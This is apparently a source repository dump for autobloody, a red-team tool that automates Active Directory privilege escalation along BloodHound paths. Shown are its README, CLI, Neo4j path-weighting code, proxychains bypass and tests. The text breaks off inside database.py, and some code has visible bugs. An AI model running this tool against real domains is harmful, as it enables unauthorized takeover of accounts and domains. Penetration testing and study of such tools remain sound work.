├── requirements.txt ├── tests ├── __init__.py ├── test_timeout.py ├── test_automation_changes.py └── test_functional.py ├── autobloody ├── __init__.py ├── proxy_bypass.py ├── main.py ├── database.py └── automation.py ├── .gitignore ├── autobloody.py ├── .github └── FUNDING.yml ├── pyproject.toml ├── LICENSE └── README.md /requirements.txt: -------------------------------------------------------------------------------- 1 | . -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /autobloody/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | *.json 3 | venv/ 4 | *.egg-info/ 5 | dist/ 6 | build/ -------------------------------------------------------------------------------- /autobloody.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from autobloody import main 3 | 4 | 5 | if __name__ == "__main__": 6 | main.main() 7 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: CravateRouge 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry 13 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] 14 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [build-system] 2 | requires = ["hatchling"] 3 | build-backend = "hatchling.build" 4 | 5 | [project] 6 | name = "autobloody" 7 | authors = [ 8 | { name="CravateRouge", email="baptiste.crepin@ntymail.com" }, 9 | ] 10 | version = "1.1.0" 11 | description = "AD Privesc Automation" 12 | readme = "README.md" 13 | requires-python = ">=3.8" 14 | classifiers = [ 15 | "Programming Language :: Python :: 3", 16 | "License :: OSI Approved :: MIT License", 17 | "Operating System :: OS Independent", 18 | ] 19 | dependencies = [ 20 | "bloodyAD>=2.3.1", 21 | "neo4j>=5.0.0", 22 | ] 23 | 24 | [project.urls] 25 | "Homepage" = "https://github.com/CravateRouge/autobloody" 26 | "Bug Tracker" = "https://github.com/CravateRouge/autobloody/issues" 27 | 28 | [project.scripts] 29 | autobloody = "autobloody.main:main" -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 CravateRouge 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /tests/test_timeout.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | import sys 3 | import argparse 4 | from unittest.mock import patch 5 | from autobloody import main 6 | 7 | 8 | class TestTimeoutArgument(unittest.TestCase): 9 | """Test that timeout argument is properly parsed and has correct default""" 10 | 11 | def test_timeout_default_value(self): 12 | """Test that timeout has default value of 60""" 13 | # Mock sys.argv to provide required arguments 14 | test_args = [ 15 | 'autobloody', 16 | '-dp', 'test_password', 17 | '-ds', 'TEST.SOURCE@DOMAIN.LOCAL', 18 | '-dt', 'TEST.TARGET@DOMAIN.LOCAL', 19 | '--host', '192.168.1.1' 20 | ] 21 | 22 | with patch.object(sys, 'argv', test_args): 23 | parser = argparse.ArgumentParser() 24 | # Recreate the parser setup from main.py 25 | parser.add_argument("-dp", "--dbpassword", required=True) 26 | parser.add_argument("-ds", "--dbsource", required=True) 27 | parser.add_argument("-dt", "--dbtarget", required=True) 28 | parser.add_argument("--host", required=True) 29 | parser.add_argument("--timeout", type=int, default=60) 30 | 31 | args = parser.parse_args(test_args[1:]) 32 | 33 | # Verify default timeout is 60 34 | self.assertEqual(args.timeout, 60) 35 | 36 | def test_timeout_custom_value(self): 37 | """Test that custom timeout value is properly set""" 38 | test_args = [ 39 | 'autobloody', 40 | '-dp', 'test_password', 41 | '-ds', 'TEST.SOURCE@DOMAIN.LOCAL', 42 | '-dt', 'TEST.TARGET@DOMAIN.LOCAL', 43 | '--host', '192.168.1.1', 44 | '--timeout', '120' 45 | ] 46 | 47 | with patch.object(sys, 'argv', test_args): 48 | parser = argparse.ArgumentParser() 49 | parser.add_argument("-dp", "--dbpassword", required=True) 50 | parser.add_argument("-ds", "--dbsource", required=True) 51 | parser.add_argument("-dt", "--dbtarget", required=True) 52 | parser.add_argument("--host", required=True) 53 | parser.add_argument("--timeout", type=int, default=60) 54 | 55 | args = parser.parse_args(test_args[1:]) 56 | 57 | # Verify custom timeout is properly set 58 | self.assertEqual(args.timeout, 120) 59 | 60 | 61 | if __name__ == "__main__": 62 | unittest.main() 63 | -------------------------------------------------------------------------------- /autobloody/proxy_bypass.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | import os 3 | import socket 4 | import platform 5 | from bloodyAD import utils 6 | 7 | LOG = utils.LOG 8 | 9 | 10 | class ProxyBypass: 11 | proxy_connect = None 12 | 13 | def __init__(self): 14 | proxy_detected = ( 15 | "LD_PRELOAD" in os.environ and "proxychains" in os.environ["LD_PRELOAD"] 16 | ) 17 | LOG.info("[*] Connection to Neo4j") 18 | if not proxy_detected: 19 | LOG.info("[*] No proxy detected") 20 | return 21 | supported_platform = platform.system() in ["Darwin", "Linux"] 22 | if not supported_platform: 23 | LOG.warning( 24 | f"[-] Proxy detected but {plateform.system()} is not currently" 25 | " supported. Please raise an issue on the Github repo" 26 | ) 27 | return 28 | 29 | self.proxy_connect = socket.socket.connect 30 | 31 | socket.socket.connect = real_connect 32 | LOG.info("[+] Proxy bypass enabled for Neo4j connection") 33 | 34 | def disable(self): 35 | if self.proxy_connect: 36 | socket.socket.connect = self.proxy_connect 37 | LOG.info("[+] Proxy bypass disabled") 38 | 39 | 40 | class c_addrinfo(Structure): 41 | pass 42 | 43 | 44 | c_addrinfo._fields_ = ( 45 | [ 46 | ("ai_flags", c_int), 47 | ("ai_family", c_int), 48 | ("ai_socktype", c_int), 49 | ("ai_protocol", c_int), 50 | ("ai_addrlen", c_size_t), 51 | ] 52 | + ( 53 | [ 54 | ("ai_canonname", c_char_p), 55 | ("ai_addr", POINTER(c_sockaddr_in)), 56 | ] 57 | if platform.system() == "Darwin" 58 | else [ 59 | ("ai_addr", c_void_p), 60 | ("ai_canonname", c_char_p), 61 | ] 62 | ) 63 | + [ 64 | ("ai_next", POINTER(c_addrinfo)), 65 | ] 66 | ) 67 | 68 | 69 | def real_connect(sock_obj, addro): 70 | libc = CDLL("libc.so.6") 71 | get_errno_loc = libc.__errno_location 72 | get_errno_loc.restype = POINTER(c_int) 73 | 74 | def errcheck(ret, func, args): 75 | if ret == -1: 76 | e = get_errno_loc()[0] 77 | raise OSError(e) 78 | return ret 79 | 80 | # addr = c_sockaddr_in(sock_obj.family, c_ushort(socket.htons(addro[1])), (c_byte *4)(*[int(i) for i in addro[0].split('.')])) 81 | # size_addr = sizeof(addr) 82 | c_getaddrinfo = libc.getaddrinfo 83 | c_getaddrinfo.errcheck = errcheck 84 | presult = POINTER(c_addrinfo)() 85 | hints = c_addrinfo() 86 | hints.ai_family = sock_obj.family 87 | hints.ai_socktype = sock_obj.type 88 | hints.ai_flags = 0 89 | hints.ai_protocol = sock_obj.proto 90 | c_getaddrinfo( 91 | addro[0].encode("utf-8"), 92 | str(addro[1]).encode("utf-8"), 93 | byref(hints), 94 | byref(presult), 95 | ) 96 | 97 | # Wait until DB response 98 | blocking = sock_obj.getblocking() 99 | sock_obj.setblocking(True) 100 | 101 | c_connect = libc.connect 102 | c_connect.errcheck = errcheck 103 | c_connect( 104 | sock_obj.fileno(), 105 | c_void_p(presult.contents.ai_addr), 106 | presult.contents.ai_addrlen, 107 | ) 108 | 109 | libc.freeaddrinfo(presult) 110 | 111 | sock_obj.setblocking(blocking) 112 | 113 | 114 | # class c_sockaddr_in(Structure): 115 | # _fields_ = [ 116 | # ('sa_family', c_ushort), 117 | # ('sin_port', c_ushort), 118 | # ("sin_addr", c_byte * 4), 119 | # ("__pad", c_byte * 8) 120 | # ] 121 | -------------------------------------------------------------------------------- /tests/test_automation_changes.py: -------------------------------------------------------------------------------- 1 | """ 2 | Unit tests for automation.py changes 3 | Tests the new functions for shadowCredentials and ACL inheritance checks 4 | """ 5 | import unittest 6 | from unittest.mock import Mock, AsyncMock, patch, MagicMock 7 | import sys 8 | import os 9 | 10 | # Add parent directory to path 11 | sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..')) 12 | 13 | from autobloody.automation import Automation 14 | 15 | 16 | class TestAutomationChanges(unittest.IsolatedAsyncioTestCase): 17 | """Test cases for the new automation functions""" 18 | 19 | def setUp(self): 20 | """Set up test fixtures""" 21 | self.mock_args = Mock() 22 | self.mock_args.username = "test_user" 23 | self.mock_args.password = "test_pass" 24 | self.mock_args.domain = "test.local" 25 | self.mock_args.host = "dc.test.local" 26 | 27 | # Create a simple path 28 | self.path = [] 29 | 30 | # Initialize Automation object 31 | self.automation = Automation(self.mock_args, self.path) 32 | 33 | def test_rel_types_mapping(self): 34 | """Test that rel_types mapping has been updated correctly""" 35 | # Check that edge type 100000 is mapped to _shadowCredentialsOrForceChange 36 | self.assertEqual( 37 | self.automation.rel_types[100000].__name__, 38 | '_shadowCredentialsOrForceChange' 39 | ) 40 | 41 | # Check that edge type 200 is mapped to _aclOuGpo 42 | self.assertEqual( 43 | self.automation.rel_types[200].__name__, 44 | '_aclOuGpo' 45 | ) 46 | 47 | # Check that edge type 110000 still points to _forceChangePassword 48 | self.assertEqual( 49 | self.automation.rel_types[110000].__name__, 50 | '_forceChangePassword' 51 | ) 52 | 53 | def test_shadowCredentialsOrForceChange_exists(self): 54 | """Test that _shadowCredentialsOrForceChange method exists""" 55 | self.assertTrue(hasattr(self.automation, '_shadowCredentialsOrForceChange')) 56 | self.assertTrue(callable(getattr(self.automation, '_shadowCredentialsOrForceChange'))) 57 | 58 | def test_aclOuGpo_exists(self): 59 | """Test that _aclOuGpo method exists""" 60 | self.assertTrue(hasattr(self.automation, '_aclOuGpo')) 61 | self.assertTrue(callable(getattr(self.automation, '_aclOuGpo'))) 62 | 63 | async def test_shadowCredentialsOrForceChange_simulation(self): 64 | """Test _shadowCredentialsOrForceChange in simulation mode""" 65 | # Set up simulation mode 66 | self.automation.simulation = True 67 | self.automation.rel_str = { 68 | "password": "[Change password] of {} to {}" 69 | } 70 | 71 | # Create mock relationship 72 | rel = { 73 | "end_node": { 74 | "name": "target_user" 75 | } 76 | } 77 | 78 | # Mock _printOperation 79 | self.automation._printOperation = Mock() 80 | 81 | # Call the function 82 | await self.automation._shadowCredentialsOrForceChange(rel) 83 | 84 | # Verify _printOperation was called 85 | self.automation._printOperation.assert_called_once() 86 | 87 | async def test_aclOuGpo_simulation(self): 88 | """Test _aclOuGpo in simulation mode""" 89 | # Set up simulation mode 90 | self.automation.simulation = True 91 | self.automation.rel_str = { 92 | "genericAll": "[GenericAll given] on {} to {}" 93 | } 94 | 95 | # Create mock relationship 96 | rel = { 97 | "start_node": { 98 | "name": "source_user" 99 | }, 100 | "end_node": { 101 | "name": "target_ou" 102 | } 103 | } 104 | 105 | # Mock _genericAll 106 | self.automation._genericAll = AsyncMock() 107 | 108 | # Call the function 109 | await self.automation._aclOuGpo(rel) 110 | 111 | # Verify _genericAll was called 112 | self.automation._genericAll.assert_called_once_with(rel) 113 | 114 | 115 | if __name__ == '__main__': 116 | unittest.main() 117 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ![bloodyAD logo](https://repository-images.githubusercontent.com/415977068/9b2fed72-35fb-4faa-a8d3-b120cd3c396f) autobloody 2 | `autobloody` is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound. 3 | 4 | ## Description 5 | This tool automates the AD privesc between two AD objects, the source (the one we own) and the target (the one we want) if a privesc path exists in BloodHound database. 6 | The automation is composed of two steps: 7 | - Finding the optimal path for privesc using bloodhound data and neo4j queries. 8 | - Execute the path found using `bloodyAD` package 9 | 10 | Because autobloody relies on [bloodyAD](https://github.com/CravateRouge/bloodyAD), it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc. 11 | 12 | ## Installation 13 | A python package is available: 14 | ```ps1 15 | pip install autobloody 16 | ``` 17 | 18 | Or you can clone the repo: 19 | ```ps1 20 | git clone --depth 1 https://github.com/CravateRouge/autobloody 21 | pip install . 22 | ``` 23 | ### Dependencies 24 | - [bloodyAD](https://github.com/CravateRouge/bloodyAD) 25 | - Neo4j python driver 26 | - Neo4j with BloodHound 27 | - Python 3 28 | 29 | For better performance, it's recommended to have the [GDS library](https://neo4j.com/docs/graph-data-science/current/installation/) installed in Neo4j. Without it, autobloody will use native CYPHER queries which are slower but still functional. 30 | 31 | A light bloodhound environment with GDS plugin can be installed by launching `./bloodhound-ce` from [https://github.com/CravateRouge/Single-User-BloodHound](https://github.com/CravateRouge/Single-User-BloodHound). 32 | 33 | ## How to use it 34 | First data must be imported into BloodHound (e.g using SharpHound or BloodHound.py) and Neo4j must be running. 35 | 36 | > :warning: **-ds and -dt values are case sensitive** 37 | 38 | Simple usage: 39 | ```ps1 40 | autobloody -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL' 41 | ``` 42 | 43 | Full help: 44 | ```ps1 45 | [bloodyAD]$ ./autobloody.py -h 46 | usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST [-y] [-v] [--timeout TIMEOUT] 47 | 48 | AD Privesc Automation 49 | 50 | options: 51 | -h, --help show this help message and exit 52 | --dburi DBURI The host neo4j is running on (default is "bolt://localhost:7687") 53 | -du DBUSER, --dbuser DBUSER 54 | Neo4j username to use (default is "neo4j") 55 | -dp DBPASSWORD, --dbpassword DBPASSWORD 56 | Neo4j password to use 57 | -ds DBSOURCE, --dbsource DBSOURCE 58 | Case sensitive label of the source node (name property in bloodhound) 59 | -dt DBTARGET, --dbtarget DBTARGET 60 | Case sensitive label of the target node (name property in bloodhound) 61 | -d DOMAIN, --domain DOMAIN 62 | Domain used for NTLM authentication (optional, default is dbsource domain) 63 | -u USERNAME, --username USERNAME 64 | Username used for NTLM authentication (optional, default is dbsource sAMAccountName) 65 | -p PASSWORD, --password PASSWORD 66 | Cleartext password or LMHASH:NTHASH for NTLM authentication 67 | -k, --kerberos 68 | -c CERTIFICATE, --certificate CERTIFICATE 69 | Certificate authentication, e.g: "path/to/key:path/to/cert" 70 | -s, --secure Try to use LDAP over TLS aka LDAPS (default is LDAP) 71 | --host HOST Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3) 72 | -y, --yes Assume yes to apply the generated privesc 73 | -v, --verbose Enable verbose output (-v for INFO, -vv for DEBUG) 74 | --timeout TIMEOUT Connection timeout in seconds (default is 60) 75 | ``` 76 | 77 | ## How it works 78 | First a privesc path is found using the Dijkstra's algorithm implemented into the Neo4j's GDS library. 79 | The Dijkstra's algorithm allows to solve the shortest path problem on a weighted graph. By default the edges created by BloodHound don't have weight but a type (e.g MemberOf, WriteOwner). A weight is then added to each edge accordingly to the type of edge and the type of node reached (e.g user,group,domain). 80 | 81 | Once a path is generated, `autobloody` will connect to the DC and execute the path and clean what is reversible (everything except `ForcePasswordChange` and `setOwner`). 82 | 83 | ## Limitations 84 | For now, only the following BloodHound edges are currently supported for automatic exploitation: 85 | - MemberOf 86 | - ForceChangePassword 87 | - AddMembers 88 | - AddSelf 89 | - DCSync 90 | - GetChanges/GetChangesAll 91 | - GenericAll 92 | - WriteDacl 93 | - GenericWrite 94 | - WriteOwner 95 | - Owns 96 | - Contains 97 | - AllExtendedRights 98 | - ReadGMSAPassword 99 | 100 | ## Support 101 | Like this project? Donations are welcome [![](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&color=%23fe8e86)](https://github.com/sponsors/CravateRouge) 102 | 103 | Need personalized support? send me an [email](mailto:baptiste.crepin@ntymail.com) for trainings or custom features. 104 | -------------------------------------------------------------------------------- /tests/test_functional.py: -------------------------------------------------------------------------------- 1 | import unittest, subprocess, pathlib, json, os 2 | 3 | 4 | class TestModules(unittest.TestCase): 5 | @classmethod 6 | def setUpClass(cls): 7 | conf = json.loads((pathlib.Path(__file__).parent / "secrets.json").read_text()) 8 | cls.domain = conf["domain"] 9 | cls.rootDomainNamingContext = ",".join([ 10 | "DC=" + subdomain for subdomain in cls.domain.split(".") 11 | ]) 12 | cls.host = conf["pdc"]["ip"] 13 | cls.admin = { 14 | "username": conf["admin_user"]["username"], 15 | "password": conf["admin_user"]["password"], 16 | } 17 | cls.pkinit_path = conf["pkinit_path"] 18 | cls.toTear = [] 19 | cls.env = os.environ.copy() 20 | cls.autobloody_prefix = [ 21 | "python3", 22 | "autobloody.py", 23 | "--host", 24 | cls.host, 25 | "-d", 26 | cls.domain, 27 | ] 28 | cls.neo4j = { 29 | "username": conf["neo4j"]["username"], 30 | "password": conf["neo4j"]["password"], 31 | "uri": conf["neo4j"]["uri"], 32 | } 33 | # db = Database(cls.neo4j) 34 | # graph = populateAD() 35 | # db.createGraph(graph) 36 | # db.close() 37 | 38 | def test_SimpleRun(self): 39 | # TODO Add edges/nodes to neo4j database and delete them at the end of the run 40 | # TODO Add objects to AD and delete them at the end of the run 41 | # TODO check error if path doesn't exist in DB 42 | self.launchProcess( 43 | self.autobloody_prefix 44 | + [ 45 | "-y", 46 | "-u", 47 | "auto.john", 48 | "-p", 49 | "Password123!", 50 | "-dp", 51 | "Password123!", 52 | "-ds", 53 | "AUTO.JOHN@BLOODY.LOCAL", 54 | "-dt", 55 | "BLOODY.LOCAL", 56 | ] 57 | ) 58 | 59 | def populateAD(): 60 | graph = [ 61 | { 62 | "name": "AddSelf", 63 | "snode": { 64 | "label": "User", 65 | "prop": { 66 | "name": "auto.selfuser", 67 | "distinguishedname": "", 68 | "objectId": "", 69 | }, 70 | }, 71 | "enode": { 72 | "label": "Group", 73 | "prop": { 74 | "name": "auto.selfgroup", 75 | "distinguishedname": "", 76 | "objectId": "", 77 | }, 78 | }, 79 | } 80 | ] 81 | 82 | return graph 83 | 84 | def pkinit(self, username, outfile): 85 | self.assertRegex( 86 | self.launchProcess( 87 | [ 88 | "python3", 89 | f"{self.pkinit_path}/gettgtpkinit.py", 90 | "-dc-ip", 91 | self.host, 92 | "-cert-pem", 93 | f"{outfile}_cert.pem", 94 | "-key-pem", 95 | f"{outfile}_priv.pem", 96 | f"{self.domain}/{username}", 97 | f"{outfile}.ccache", 98 | ], 99 | False, 100 | ), 101 | "Saved TGT to file", 102 | ) 103 | for name in [f"{outfile}_cert.pem", f"{outfile}_priv.pem", f"{outfile}.ccache"]: 104 | self.toTear.append([(pathlib.Path() / name).unlink]) 105 | 106 | @classmethod 107 | def tearDownClass(cls): 108 | while len(cls.toTear): 109 | func = cls.toTear.pop() 110 | if len(func) > 1: 111 | func[0](*func[1:]) 112 | else: 113 | func[0]() 114 | 115 | def launchProcess(self, cmd, isErr=True, doPrint=True): 116 | out, err = subprocess.Popen( 117 | cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=self.env 118 | ).communicate() 119 | out = out.decode() 120 | if isErr: 121 | self.assertTrue(out, self.printErr(err.decode(), cmd)) 122 | else: 123 | out += "\n" + err.decode() 124 | if doPrint: 125 | print(out) 126 | return out 127 | 128 | def printErr(self, err, cmd): 129 | err = err.replace("\n", "\n ") 130 | self.err = f"here is the error output ->\n\n {cmd}\n{err}" 131 | return self.err 132 | 133 | 134 | from neo4j import GraphDatabase 135 | 136 | 137 | class Database: 138 | def __init__(self, neo4j_creds): 139 | self.driver = GraphDatabase.driver( 140 | neo4j_creds["uri"], auth=(neo4j_creds["user"], neo4j_creds["password"]) 141 | ) 142 | self._prepareDb() 143 | 144 | def close(self): 145 | self.driver.close() 146 | 147 | def createGraph(self, graph): 148 | with self.driver.session() as session: 149 | session.write_transaction(self._createGraph, graph) 150 | 151 | def destroyGraph(self, graph): 152 | with self.driver.session() as session: 153 | session.write_transaction(self._destroyGraph, graph) 154 | 155 | @staticmethod 156 | def _createGraph(tx, graph): 157 | for rel in graph: 158 | tx.run( 159 | "CREATE (n:$slabel $sprop)", 160 | slabel=rel["snode"]["label"], 161 | elabel=rel["enode"]["label"], 162 | ) 163 | 164 | @staticmethod 165 | def _destroyGraph(tx, graph): 166 | pass 167 | 168 | 169 | if __name__ == "__main__": 170 | unittest.main(failfast=True) 171 | -------------------------------------------------------------------------------- /autobloody/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import argparse, sys, asyncio, logging 3 | from autobloody import automation, database, proxy_bypass 4 | 5 | LOG = logging.getLogger('autobloody') 6 | 7 | class PrefixedFormatter(logging.Formatter): 8 | """Custom formatter that adds prefixes based on log level""" 9 | 10 | PREFIXES = { 11 | logging.DEBUG: '[*]', 12 | logging.INFO: '[+]', 13 | logging.WARNING: '[!]', 14 | logging.ERROR: '[-]', 15 | logging.CRITICAL: '[-]', 16 | } 17 | 18 | def format(self, record): 19 | prefix = self.PREFIXES.get(record.levelno, '') 20 | if prefix: 21 | record.msg = f"{prefix} {record.msg}" 22 | return super().format(record) 23 | 24 | 25 | def setup_logging(verbosity): 26 | """Configure logging based on verbosity level""" 27 | # Remove existing handlers 28 | LOG.handlers.clear() 29 | 30 | # Set level based on verbosity 31 | if verbosity >= 2: 32 | level = logging.DEBUG 33 | elif verbosity == 1: 34 | level = logging.INFO 35 | else: 36 | level = logging.WARNING 37 | 38 | LOG.setLevel(level) 39 | LOG.propagate = False 40 | # Create console handler with custom formatter 41 | handler = logging.StreamHandler() 42 | handler.setLevel(level) 43 | formatter = PrefixedFormatter('%(message)s') 44 | handler.setFormatter(formatter) 45 | LOG.addHandler(handler) 46 | 47 | 48 | def main(): 49 | parser = argparse.ArgumentParser( 50 | description="AD Privesc Automation", 51 | formatter_class=argparse.RawTextHelpFormatter, 52 | ) 53 | 54 | # DB parameters 55 | parser.add_argument( 56 | "--dburi", 57 | default="bolt://localhost:7687", 58 | help='The host neo4j is running on (default is "bolt://localhost:7687")', 59 | ) 60 | parser.add_argument( 61 | "-du", 62 | "--dbuser", 63 | default="neo4j", 64 | help='Neo4j username to use (default is "neo4j")', 65 | ) 66 | parser.add_argument( 67 | "-dp", "--dbpassword", help="Neo4j password to use", required=True 68 | ) 69 | parser.add_argument( 70 | "-ds", 71 | "--dbsource", 72 | help="Case sensitive label of the source node (name property in bloodhound)", 73 | required=True, 74 | ) 75 | parser.add_argument( 76 | "-dt", 77 | "--dbtarget", 78 | help="Case sensitive label of the target node (name property in bloodhound)", 79 | required=True, 80 | ) 81 | 82 | # Exploitation parameters 83 | parser.add_argument("-d", "--domain", help="Domain used for NTLM authentication (Default is dbsource domain)") 84 | parser.add_argument( 85 | "-u", "--username", help="Username used for NTLM authentication (Default is dbsource sAMAccountName)" 86 | ) 87 | parser.add_argument( 88 | "-p", 89 | "--password", 90 | help="Cleartext password or LMHASH:NTHASH for NTLM authentication", 91 | ) 92 | parser.add_argument("-k", "--kerberos", action="store_true", default=False) 93 | parser.add_argument( 94 | "-c", 95 | "--certificate", 96 | help='Certificate authentication, e.g: "path/to/key:path/to/cert"', 97 | ) 98 | parser.add_argument( 99 | "-s", 100 | "--secure", 101 | help="Try to use LDAP over TLS aka LDAPS (default is LDAP)", 102 | action="store_true", 103 | default=False, 104 | ) 105 | parser.add_argument( 106 | "--host", 107 | help="Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)", 108 | required=True, 109 | ) 110 | parser.add_argument( 111 | "-y", 112 | "--yes", 113 | help="Assume yes to apply the generated privesc", 114 | action="store_true", 115 | default=False, 116 | ) 117 | parser.add_argument( 118 | "-v", 119 | "--verbose", 120 | help="Enable verbose output (-v for INFO, -vv for DEBUG)", 121 | action="count", 122 | default=0, 123 | ) 124 | parser.add_argument( 125 | "--timeout", 126 | help="Connection timeout in seconds (default is 60)", 127 | type=int, 128 | default=60, 129 | ) 130 | 131 | if len(sys.argv) == 1: 132 | parser.print_help(sys.stderr) 133 | sys.exit(1) 134 | 135 | args = parser.parse_args() 136 | 137 | # Setup logging based on verbosity 138 | setup_logging(args.verbose) 139 | asyncio.run(run_autobloody(args)) 140 | 141 | 142 | async def run_autobloody(args): 143 | path_dict = await pathgen(args) 144 | 145 | if not args.domain: 146 | args.domain = path_dict[0]["start_node"]["domain"] 147 | if not args.username: 148 | args.username = path_dict[0]["start_node"]["samaccountname"] 149 | 150 | automate = automation.Automation(args, path_dict) 151 | 152 | if args.yes: 153 | execute_path = "y" 154 | else: 155 | await automate.simulate() 156 | execute_path = input("\n\nApply this privesc?(y/n)") 157 | 158 | if execute_path == "y": 159 | await automate.exploit() 160 | print("\n[+] Done, attack path executed") 161 | else: 162 | print("\n[-] Attack path not executed") 163 | 164 | 165 | async def pathgen(args): 166 | bypass = proxy_bypass.ProxyBypass() 167 | db = database.Database(args.dburi, args.dbuser, args.dbpassword) 168 | 169 | path = db.getPrivescPath(args.dbsource, args.dbtarget) 170 | path_dict = [] 171 | for rel in path: 172 | start_node = { 173 | "name": rel.start_node["name"], 174 | "distinguishedname": rel.start_node["distinguishedname"], 175 | "objectid": rel.start_node["objectid"], 176 | "samaccountname": rel.start_node.get("samaccountname"), 177 | "domain": rel.start_node.get("domain"), 178 | } 179 | end_node = { 180 | "name": rel.end_node["name"], 181 | "distinguishedname": rel.end_node["distinguishedname"], 182 | "objectid": rel.end_node["objectid"], 183 | "samaccountname": rel.end_node.get("samaccountname"), 184 | "domain": rel.end_node.get("domain"), 185 | } 186 | path_dict.append({ 187 | "start_node": start_node, "end_node": end_node, "cost": rel.get("cost", rel.get("bloodycost")) 188 | }) 189 | 190 | db.close() 191 | bypass.disable() 192 | 193 | print( 194 | f"[+] Done, {len(path_dict)} edges have been found between {args.dbsource} and" 195 | f" {args.dbtarget}" 196 | ) 197 | return path_dict 198 | 199 | 200 | if __name__ == "__main__": 201 | main() 202 | -------------------------------------------------------------------------------- /autobloody/database.py: -------------------------------------------------------------------------------- 1 | from neo4j import GraphDatabase 2 | import logging 3 | 4 | LOG = logging.getLogger('autobloody') 5 | 6 | class Database: 7 | def __init__(self, uri, user, password): 8 | logging.getLogger("neo4j").setLevel(logging.WARNING) 9 | self.driver = GraphDatabase.driver(uri, auth=(user, password)) 10 | self._checkGDS() 11 | self._prepareDb() 12 | 13 | def getPrivescPath(self, source, target): 14 | with self.driver.session() as session: 15 | relationships = session.execute_read( 16 | self._findShortestPath, source, target 17 | ) 18 | return relationships 19 | 20 | def close(self): 21 | self.driver.close() 22 | 23 | def _checkGDS(self): 24 | """Check if GDS plugin is installed""" 25 | with self.driver.session() as session: 26 | try: 27 | # Try to call a GDS function 28 | result = session.run("RETURN gds.version()").single() 29 | self.gds_available = True 30 | LOG.info(f"GDS plugin detected (version {result[0]})") 31 | except Exception: 32 | self.gds_available = False 33 | LOG.warning("GDS plugin not detected, will use native CYPHER queries (slower)") 34 | 35 | def _prepareDb(self): 36 | with self.driver.session() as session: 37 | session.execute_write(self._setWeight) 38 | if self.gds_available: 39 | session.execute_write(self._createGraph) 40 | 41 | # Cost is based on edge exploitation difficulty and impact 42 | # If ldap doesn't need to be queried like with MemberOf, it has no cost 43 | # If edge gives Domain Admin rights, it has the lowest cost 44 | # If edge only requires reading ldap like ReadGMSAPassword, it has a low cost 45 | # If edge requires writing ldap, the cost will be higher and depend of how much writing is needed (e.g.WriteOwner requires 3 writing) 46 | # If edges requires manual steps after like GPO edges, cost is higher 47 | # If edges requires potentially changing passwords, cost is higher because it can disrupt services 48 | @staticmethod 49 | def _setWeight(tx): 50 | # Existing edges on https://github.com/BloodHoundAD/BloodHound/blob/master/docs/data-analysis/edges.rst 51 | bloodycosts = [ 52 | {"cost": 0, "edges": "MemberOf", "endnode": "Group"}, 53 | { 54 | "cost": 1, 55 | "edges": "DCSync|GenericAll|GetChangesAll|AllExtendedRights", 56 | "endnode": "Domain", 57 | }, 58 | {"cost": 2, "edges": "WriteDacl|Owns", "endnode": "Domain"}, 59 | {"cost": 3, "edges": "WriteOwner", "endnode": "Domain"}, 60 | {"cost": 10, "edges": "ReadGMSAPassword", "endnode": ""}, 61 | { 62 | "cost": 100, 63 | "edges": "AddSelf|AddMember|GenericAll|GenericWrite|AllExtendedRights|Contains", 64 | "endnode": 